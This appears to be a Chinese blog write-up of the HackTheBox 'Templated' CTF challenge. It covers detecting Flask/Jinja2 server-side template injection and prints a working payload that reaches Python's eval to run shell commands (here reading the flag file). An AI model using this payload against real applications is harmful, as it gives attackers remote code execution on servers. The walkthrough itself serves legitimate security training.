HTB-Templated
文章目录
- 概述
- 题目
- 题目概述
- 题目解答
概述
HackTheBox 网站CTF靶场Web相关题目Templated,题目地址https://app.hackthebox.com/challenges/templated,考察Flask SSTI(服务器模板注入)漏洞的利用。
题目
题目概述
开启程序实例后,提示访问167.99.202.131:31954
,访问http://167.99.202.131:31954,看到如下Web界面
提示很明确,使用了Flask和Jinja2,结合题目名称Templated,大概率为Flask SSTI漏洞,测试过程如下
首先访问http://167.99.202.131:31954/flag
接着访问http://167.99.202.131:31954/{{3*3}}
题目解答
SSTI利用代码如下
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='_IterationGuard' %}
{{ c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat flag*').read()") }}
{% endif %}
{% endfor %}
使用火狐浏览器的HackBar Quantum插件,拼接url,得到flag
HTB-Templated相关推荐
- 手机流量共享 linux,linux – 通过HTB共享带宽和优先处理实时流量,哪种方案更好?...
我想在我们的互联网线路上添加一些流量管理.在阅读了大量文档之后,我认为HFSC对我来说太复杂了(我不了解所有曲线的东西,我担心我永远不会把它弄好),CBQ不推荐,基本上HTB就是通往适合大多数人. 我 ...
- linux htb 源代码,LINUX TC:HTB相关源码
LINUX TC:HTB相关源码 收藏 HTB(hierarchy token buffer)是linux tc(traffic control)模块中的排队队列的一种.它的配置比CBQ要简单.同时实 ...
- RazorExtensions Templated Razor Delegates
原文发布时间为:2011-04-27 -- 来源于本人的百度文章 [由搬家工具导入] Templated Razor Delegates David Fowler turned me on to a ...
- Linux 工具 | 第1篇:高级流控-TC+HTB+IFB+内核模块
作者:isshe 日期:2018.09.19 邮箱:i.sshe@outlook.com github: https://github.com/isshe 高级流控-TC+HTB+IFB+内核模块 1 ...
- linux下TC+HTB流量控制
C规则涉及到 队列(QUEUE) 分类器(CLASS) 过滤器(FILTER),filter划分的标志位可用U32或iptables的set-mark来实现 ) 一般是"控发"不控 ...
- HTB打靶(Active Directory 101 Mantis)
namp扫描 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 03:40 EST Stats: 0:01:28 elapsed; 0 hos ...
- Linux TC 流量控制与排队规则 qdisc 树型结构详解(以HTB和RED为例)
1. 背景 Linux 操作系统中的流量控制器 TC (Traffic Control) 用于Linux内核的流量控制,它规定建立处理数据包的队列,并定义队列中的数据包被发送的方式,从而实现对流量的控 ...
- 漏洞payload 靶机_【HTB系列】靶机Bitlab的渗透测试
本文作者:是大方子(Ms08067实验室核心成员) ﹀ ﹀ ﹀ 0x00 本文目录 反思与总结 基本信息 渗透测试过程 补充 0x01 反思与总结 1. curl 发送GET参数化请求 2. 对反弹回 ...
- HTB打靶(Active Directory 101 Reel)
nmap扫描目标 nmap -A -T4 10.10.10.77 Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-18 01:30 EST Nma ...
- HTB靶场系列 Windows靶机 Granny靶机
勘探 还是使用nmap进行侦擦 先大致扫描 nmap 10.10.10.15 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-01 10:29 C ...
最新文章
- linux sed高级用法,sed 高级用法
- jquery lt选择器与gt选择器
- PHP做好友关系系统,php社交好友网站
- Boost:将自定义占位符_1复制到arg <1>的测试程序
- Windows下如何如何将项目上传至GitHub?
- 字符串大写转小写库函数_PHP程序无需使用库函数即可将字符串转换为大写
- log4j 总结 精华
- JavaSE----数组
- 条码电子秤商品怎么录入?
- 深度学习在时空数据的应用
- Moviebooking电影售票系统--用例建模
- cobar mysql_阿里开源Mysql分布式中间件:Cobar
- 电脑小技巧:关于修复只能看无法拖…
- 取火柴 c语言程序,hdu 1907 John(取火柴游戏)
- 《心灵捕手》经典台词
- linux ping结果中mdev,ping之mdev值
- Stronger Data Poisoning Attacks Break Data Sanitization Defenses
- 2016年8月16日 星期二 --出埃及记 Exodus 16:17
- cesium 使用时间轴显示轮船实时位置轨迹,通过粒子系统添加轮船尾浪效果
- android 发送语音功能和ios交互格式aac
热门文章
- 场景实践 | 如何使用融云超级群构建游戏社区
- POJ2828 Buy Tickeys 树状数组+二分 线段树留坑。。。
- USB运动控制 (五轴雕刻机系统)全部开源 不保留任何关键技术
- 已被清理的视频怎么恢复?微信过期视频怎么恢复
- 【ELT.ZIP】OpenHarmony啃论文俱乐部——综述视角解读压缩编码
- UE4 回合游戏项目 03- 创建战斗场景
- FreeCAD是什么、如何下载(windows+0.18.4版本)和安装以及中文设置
- 启航—前端—第三次作业—百度页面
- 处理Vue中相同组件不同路径的页面重新渲染
- BIM族库下载——BIM绿色文明施工族库合集50个